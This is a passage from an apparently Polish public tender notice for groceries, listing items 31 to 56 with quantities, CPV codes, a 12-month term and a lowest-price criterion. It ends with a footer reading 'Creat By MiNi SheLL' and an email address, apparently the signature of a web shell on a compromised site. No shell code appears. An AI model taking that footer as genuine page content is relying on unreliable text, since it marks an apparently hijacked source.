31	Makaron świderki 500 g wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu	kg	250
32	Makaron zacierka 250 g	szt.	140
33	Mąka pszenna 1kg	kg	360
34	Mąka ziemniaczana Superior 1kg	kg	200
35	Miód 300g	szt.	20
36	Musztarda, wartość energetyczna w 100g produktu- 129kcal 	szt.	3
37	Napój dla dzieci ,300 ml, nie zawiera sztucznych barwników i konserwantów opakowanie plastikowe	szt.	400
38	Krem czekoladowo-orzechowy 630g, zawiera 13% orzechów laskowych, wartość energ. 544 kcal w 100g produktu	szt.	10
39	Ocet 10%, 0,5 l	szt.	40
40	Papryka słodka 20g	szt.	160
41	Pieprz 20 g	szt.	150
42	Płatki śniadaniowe czekoladowe 500g, kakao-8,6%, 37 g cukru w 100g produktu, wartość energ. 382 kcal w 100g produktu	szt.	50
43	Przyprawa do zup i sosów typu Maga 850ml	szt.	75
44	Rogal z nadzieniem , 65 g	szt.	60
45	Ryż sypki długoziarnisty 1kg	kg	240
46	Soczek owocowy dla dzieci, karton 200 ml ,bez dodatku cukru	szt.	850
47	Sól spożywcza jodłowana 1kg	kg	140
48	Wafel czekoladowy 37 g	szt.	250
49	Wafel nadziewany w polewie czekoladowej, 43 g	szt.	200
50	Wafel w polewie czekoladowej, wartość energ. w 100g produktu-534 kcal, zawartość węglowodanów w 100g produktu-57,5 g	szt.	250
51	Wafelek z orzechowym nadzieniem o zawartości mlecznej czekolady 49,5% szt.	30
52	Wafelek śmietankowy bez polewy 20g	szt.	300
53	Batonik z orzechowym nadzieniem- w  jednym opakowaniu 2 sztuki batoników	op.	200
54	Ziele angielskie
15 g	szt.	80
55	Zioła prowansalskie 20 g	szt.	80
56	Żurek kiszony 450g  kubek	szt.	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com